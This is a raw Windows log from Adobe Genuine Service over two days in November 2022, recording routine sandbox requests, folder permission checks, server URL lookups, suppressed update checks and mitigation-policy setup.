11/27/22 18:34:25:218 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4908 | Sandbox process request: 1 || IsPatchingApplicable * AdobeGenuineData *  |
11/27/22 18:34:25:455 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4908 | Sandbox process response: 3 ||  *  |
11/27/22 18:34:25:455 | [ERROR] |  |  |  | AdobeGCPatchingWrapper |  |  | 4908 | Failed to fetch IsPatchingApplicable. Error: 3
11/27/22 18:34:25:455 | [INFO] |  |  |  | AdobeGCPatchingWrapper |  |  | 4908 | Patching not applicable
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateEvent Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateTimerQueue Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateTimerQueueTimer Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | Call timer routine in 6 hrs...
11/28/22 08:38:34:432 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Write Operation detected for C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db!
11/28/22 08:38:34:433 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process request: 1 || IsTargeted * AdobeGenuineData *  |
11/28/22 08:38:34:668 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process response: 1 || false *  |
11/28/22 08:38:34:668 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/28/22 08:38:34:679 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Write Operation detected for C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db!
11/28/22 08:38:34:679 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process request: 1 || IsTargeted * AdobeGenuineData *  |
11/28/22 08:38:34:914 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process response: 1 || false *  |
11/28/22 08:38:34:914 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/28/22 09:02:22:900 | [INFO] |  |  |  | AGSService |  |  | 7800 | Retrieving ptr
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | The wait timed out.
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 4908 | WaitForSingleObject Done
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 4908 | DeleteTimerQueue Done
11/28/22 09:02:22:901 | [ERROR] |  |  |  | AGSService |  |  | 7800 | Caller user name:�������
11/28/22 09:02:22:901 | [ERROR] |  |  |  | AGSService |  |  | 7800 | Started creating entries for uninstaller
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | AdobeGCData folder already exists
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | AdobeGCData folder: checking for junction/symlink
11/28/22 09:02:22:902 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/28/22 09:02:22:902 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid DACL permissions found
11/28/22 09:02:22:902 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid SACL permissions found
11/28/22 09:02:22:902 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid DACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid SACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid DACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid SACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid DACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Valid SACL permissions found
11/28/22 09:02:22:903 | [INFO] |  |  |  | AGSService |  |  | 7800 | Successfully created/fetched AdobeGCData Folder
11/28/22 09:02:22:904 | [INFO] |  |  |  | AGSService |  |  | 7800 | Thread...
11/28/22 09:02:22:904 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 1608 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/28/22 09:02:23:149 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 1608 | Sandbox process response: 3 ||  *  |
11/28/22 09:02:23:149 | [INFO] |  |  |  | AGSService |  |  | 1608 | Thread inside...
11/28/22 09:02:23:149 | [INFO] |  |  |  | AGSService |  |  | 1608 | Thread calling CFU...
11/28/22 09:02:23:149 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 1608 | ***********AdobeGC Updater library invoked = 8.1.0.3 ************
11/28/22 09:02:23:150 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 1608 | Perform WF started
11/28/22 09:02:23:150 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 1608 | Perform WF completed
11/28/22 09:02:23:150 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 1608 | ***********AdobeGC Updater library End*******************
11/28/22 09:02:23:150 | [INFO] |  |  |  | AGSService |  |  | 1608 | Thread cfu launched...
11/28/22 09:02:23:150 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Trying to acquire the semaphore
11/28/22 09:02:23:150 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Semaphore acquired
11/28/22 09:02:23:150 | [INFO] |  |  |  | AdobeGCHostfileValidation |  |  | 11916 | Hostfile opened successfully
11/28/22 09:02:23:150 | [DEBUG] |  |  |  | AdobeGCHostfileValidation |  |  | 11916 | Checking if gocart server url is blocked in hostfile
11/28/22 09:02:23:151 | [INFO] |  |  |  | SLCoreService |  |  | 11916 | Starting up SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 09:02:23:151 | [ERROR] |  |  |  | SLCoreService |  |  | 11916 | user based licensing: 0
11/28/22 09:02:23:151 | [INFO] |  |  |  | SLCoreService |  |  | 11916 | Service construction took 0.1 ms and succeed.
11/28/22 09:02:23:195 | [INFO] |  |  |  | SLCoreService |  |  | 11916 | Shutting down SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 09:02:23:195 | [INFO] |  |  |  | SLCoreService |  |  | 11916 | Service destruction took 0.1 ms and succeed.
11/28/22 09:02:23:195 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 11916 | Fetching server URL from dispatch table
11/28/22 09:02:23:195 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | (re)load Local Dispatch Table status-[0].
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Scope : [2]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Setting scope to GM
11/28/22 09:02:23:196 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 11916 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | EndPoint requested: [PostRulesData]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Length of the URL: [50]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Returning from getEndpointAddr: [0]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | EndPoint requested: [PostRulesData]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Length of the URL: [50]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | URL found [https://genuine.adobe.com/server/services/check/v1]
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Returning from getEndpointAddr: [0]
11/28/22 09:02:23:196 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 11916 | Fetching server URL from dispatch table
11/28/22 09:02:23:196 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | (re)load Local Dispatch Table status-[0].
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Scope : [2]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Setting scope to GM
11/28/22 09:02:23:197 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 11916 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | EndPoint requested: [ETSEndPoint]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Length of the URL: [48]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Returning from getEndpointAddr: [0]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | EndPoint requested: [ETSEndPoint]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Length of the URL: [48]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | URL found [https://na1e.services.adobe.com/hsmessaging/rest]
11/28/22 09:02:23:197 | [INFO] |  |  |  | DispatchClientLib |  |  | 11916 | Returning from getEndpointAddr: [0]
11/28/22 09:02:23:197 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 11916 | Delete server domain blocked key
11/28/22 09:02:23:197 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process request: 3 || ServerDomainBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 09:02:23:431 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process response: 1 ||
11/28/22 09:02:23:431 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 11916 | Delete server alias blocked key
11/28/22 09:02:23:431 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process request: 3 || ServerAliasBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 09:02:23:664 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process response: 1 ||
11/28/22 09:02:23:664 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 11916 | Delete server alias value
11/28/22 09:02:23:664 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process request: 3 || ServerAlias * AdobeGenuineNSLookUpData *  |
11/28/22 09:02:23:898 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process response: 1 ||
11/28/22 09:02:23:898 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Threaded CFU Started
11/28/22 09:02:23:898 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Update call started
11/28/22 09:02:23:898 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Suppress Update Flag = 0
11/28/22 09:02:23:898 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | GC Kill Switch = 0
11/28/22 09:02:23:898 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process request: 1 || NextUpdateCheckDate * AdobeGenuineWaitTimestamps *  |
11/28/22 09:02:24:131 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 11916 | Sandbox process response: 1 || 1669700314 *  |
11/28/22 09:02:24:131 | [ERROR] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Time flag read
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | LastUpdateCheckDurationPassed from cache 1669700314
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | LastUpdateCheckDurationPassed cached 1669700314 , curr 1669615344 res = 0
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Suppressing update check for this launch
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Update call ended
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | GCClient App not being downloaded
11/28/22 09:02:24:131 | [INFO] |  |  |  | AGSService |  |  | 11916 |
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Threaded CFU Ended
11/28/22 09:02:24:131 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 11916 | Semaphore signalled
11/28/22 09:02:24:162 | [INFO] |  |  |  | AGSService |  |  | 7800 | Thread Finished ...
11/28/22 09:02:25:170 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 7800 | Sandbox process request: 1 || IsPatchingApplicable * AdobeGenuineData *  |
11/28/22 09:02:25:406 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 7800 | Sandbox process response: 3 ||  *  |
11/28/22 09:02:25:406 | [ERROR] |  |  |  | AdobeGCPatchingWrapper |  |  | 7800 | Failed to fetch IsPatchingApplicable. Error: 3
11/28/22 09:02:25:406 | [INFO] |  |  |  | AdobeGCPatchingWrapper |  |  | 7800 | Patching not applicable
11/28/22 09:02:25:406 | [INFO] |  |  |  | AGSService |  |  | 7800 | CreateEvent Done
11/28/22 09:02:25:406 | [INFO] |  |  |  | AGSService |  |  | 7800 | CreateTimerQueue Done
11/28/22 09:02:25:407 | [INFO] |  |  |  | AGSService |  |  | 7800 | CreateTimerQueueTimer Done
11/28/22 09:02:25:407 | [INFO] |  |  |  | AGSService |  |  | 7800 | Call timer routine in 6 hrs...
11/28/22 15:02:25:408 | [INFO] |  |  |  | AGSService |  |  | 14572 | Retrieving ptr
11/28/22 15:02:25:409 | [INFO] |  |  |  | AGSService |  |  | 14572 | The wait timed out.
11/28/22 15:02:25:409 | [INFO] |  |  |  | AGSService |  |  | 7800 | WaitForSingleObject Done
11/28/22 15:02:25:409 | [INFO] |  |  |  | AGSService |  |  | 7800 | DeleteTimerQueue Done
11/28/22 15:02:25:409 | [ERROR] |  |  |  | AGSService |  |  | 14572 | Caller user name:�������
11/28/22 15:02:25:409 | [ERROR] |  |  |  | AGSService |  |  | 14572 | Started creating entries for uninstaller
11/28/22 15:02:25:410 | [INFO] |  |  |  | AGSService |  |  | 14572 | AdobeGCData folder already exists
11/28/22 15:02:25:410 | [INFO] |  |  |  | AGSService |  |  | 14572 | AdobeGCData folder: checking for junction/symlink
11/28/22 15:02:25:411 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/28/22 15:02:25:412 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid DACL permissions found
11/28/22 15:02:25:412 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid SACL permissions found
11/28/22 15:02:25:412 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid DACL permissions found
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid SACL permissions found
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid DACL permissions found
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid SACL permissions found
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/28/22 15:02:25:413 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/28/22 15:02:25:414 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid DACL permissions found
11/28/22 15:02:25:414 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 14572 | GC local storage: Valid SACL permissions found
11/28/22 15:02:25:414 | [INFO] |  |  |  | AGSService |  |  | 14572 | Successfully created/fetched AdobeGCData Folder
11/28/22 15:02:25:414 | [INFO] |  |  |  | AGSService |  |  | 14572 | Thread...
11/28/22 15:02:25:415 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16264 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/28/22 15:02:25:646 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16264 | Sandbox process response: 3 ||  *  |
11/28/22 15:02:25:646 | [INFO] |  |  |  | AGSService |  |  | 16264 | Thread inside...
11/28/22 15:02:25:646 | [INFO] |  |  |  | AGSService |  |  | 16264 | Thread calling CFU...
11/28/22 15:02:25:647 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 16264 | ***********AdobeGC Updater library invoked = 8.1.0.3 ************
11/28/22 15:02:25:647 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16264 | Perform WF started
11/28/22 15:02:25:647 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16264 | Perform WF completed
11/28/22 15:02:25:647 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 16264 | ***********AdobeGC Updater library End*******************
11/28/22 15:02:25:647 | [INFO] |  |  |  | AGSService |  |  | 16264 | Thread cfu launched...
11/28/22 15:02:25:647 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Trying to acquire the semaphore
11/28/22 15:02:25:647 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Semaphore acquired
11/28/22 15:02:25:648 | [INFO] |  |  |  | AdobeGCHostfileValidation |  |  | 16124 | Hostfile opened successfully
11/28/22 15:02:25:648 | [DEBUG] |  |  |  | AdobeGCHostfileValidation |  |  | 16124 | Checking if gocart server url is blocked in hostfile
11/28/22 15:02:25:648 | [INFO] |  |  |  | SLCoreService |  |  | 16124 | Starting up SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 15:02:25:648 | [ERROR] |  |  |  | SLCoreService |  |  | 16124 | user based licensing: 0
11/28/22 15:02:25:648 | [INFO] |  |  |  | SLCoreService |  |  | 16124 | Service construction took 0.1 ms and succeed.
11/28/22 15:02:25:812 | [INFO] |  |  |  | SLCoreService |  |  | 16124 | Shutting down SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 15:02:25:812 | [INFO] |  |  |  | SLCoreService |  |  | 16124 | Service destruction took 0.1 ms and succeed.
11/28/22 15:02:25:812 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 16124 | Fetching server URL from dispatch table
11/28/22 15:02:25:812 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 15:02:25:814 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | (re)load Local Dispatch Table status-[0].
11/28/22 15:02:25:814 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Scope : [2]
11/28/22 15:02:25:814 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Setting scope to GM
11/28/22 15:02:25:814 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 16124 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | EndPoint requested: [PostRulesData]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Length of the URL: [50]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Returning from getEndpointAddr: [0]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | EndPoint requested: [PostRulesData]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Length of the URL: [50]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | URL found [https://genuine.adobe.com/server/services/check/v1]
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Returning from getEndpointAddr: [0]
11/28/22 15:02:25:815 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 16124 | Fetching server URL from dispatch table
11/28/22 15:02:25:815 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | (re)load Local Dispatch Table status-[0].
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Scope : [2]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Setting scope to GM
11/28/22 15:02:25:816 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 16124 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | EndPoint requested: [ETSEndPoint]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Length of the URL: [48]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Returning from getEndpointAddr: [0]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | EndPoint requested: [ETSEndPoint]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Length of the URL: [48]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | URL found [https://na1e.services.adobe.com/hsmessaging/rest]
11/28/22 15:02:25:816 | [INFO] |  |  |  | DispatchClientLib |  |  | 16124 | Returning from getEndpointAddr: [0]
11/28/22 15:02:25:816 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 16124 | Delete server domain blocked key
11/28/22 15:02:25:816 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process request: 3 || ServerDomainBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 15:02:26:050 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process response: 1 ||
11/28/22 15:02:26:050 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 16124 | Delete server alias blocked key
11/28/22 15:02:26:050 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process request: 3 || ServerAliasBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 15:02:26:290 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process response: 1 ||
11/28/22 15:02:26:290 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 16124 | Delete server alias value
11/28/22 15:02:26:290 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process request: 3 || ServerAlias * AdobeGenuineNSLookUpData *  |
11/28/22 15:02:26:529 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process response: 1 ||
11/28/22 15:02:26:529 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Threaded CFU Started
11/28/22 15:02:26:530 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Update call started
11/28/22 15:02:26:530 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Suppress Update Flag = 0
11/28/22 15:02:26:530 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | GC Kill Switch = 0
11/28/22 15:02:26:530 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process request: 1 || NextUpdateCheckDate * AdobeGenuineWaitTimestamps *  |
11/28/22 15:02:26:769 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 16124 | Sandbox process response: 1 || 1669700314 *  |
11/28/22 15:02:26:769 | [ERROR] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Time flag read
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | LastUpdateCheckDurationPassed from cache 1669700314
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | LastUpdateCheckDurationPassed cached 1669700314 , curr 1669636946 res = 0
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Suppressing update check for this launch
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Update call ended
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | GCClient App not being downloaded
11/28/22 15:02:26:769 | [INFO] |  |  |  | AGSService |  |  | 16124 |
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Threaded CFU Ended
11/28/22 15:02:26:769 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 16124 | Semaphore signalled
11/28/22 15:02:27:651 | [INFO] |  |  |  | AGSService |  |  | 14572 | Thread Finished ...
11/28/22 15:02:28:654 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 14572 | Sandbox process request: 1 || IsPatchingApplicable * AdobeGenuineData *  |
11/28/22 15:02:28:893 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 14572 | Sandbox process response: 3 ||  *  |
11/28/22 15:02:28:893 | [ERROR] |  |  |  | AdobeGCPatchingWrapper |  |  | 14572 | Failed to fetch IsPatchingApplicable. Error: 3
11/28/22 15:02:28:893 | [INFO] |  |  |  | AdobeGCPatchingWrapper |  |  | 14572 | Patching not applicable
11/28/22 15:02:28:893 | [INFO] |  |  |  | AGSService |  |  | 14572 | CreateEvent Done
11/28/22 15:02:28:893 | [INFO] |  |  |  | AGSService |  |  | 14572 | CreateTimerQueue Done
11/28/22 15:02:28:893 | [INFO] |  |  |  | AGSService |  |  | 14572 | CreateTimerQueueTimer Done
11/28/22 15:02:28:893 | [INFO] |  |  |  | AGSService |  |  | 14572 | Call timer routine in 6 hrs...
11/28/22 20:11:25:668 | [INFO] |  |  |  | AGSService |  |  | 3548 | *********** AGS Service Launched = 8.1.0.3 ************
11/28/22 20:11:25:670 | [INFO] |  |  |  | AGSService |  |  | 3548 | Setting mitigation policies
11/28/22 20:11:25:670 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 3652 | *********** AGM Service Launched = 8.1.0.3 ************
11/28/22 20:11:25:671 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3548 | ProcessExtensionPointDisablePolicy set successfully
11/28/22 20:11:25:671 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 3652 | Setting mitigation policies
11/28/22 20:11:25:671 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3548 | ProcessDynamicCodePolicy set successfully
11/28/22 20:11:25:671 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3652 | ProcessExtensionPointDisablePolicy set successfully
11/28/22 20:11:25:672 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3548 | ProcessSignaturePolicy set successfully
11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3652 | ProcessDynamicCodePolicy set successfully
11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3548 | ProcessFontDisablePolicy set successfully
11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3652 | ProcessSignaturePolicy set successfully
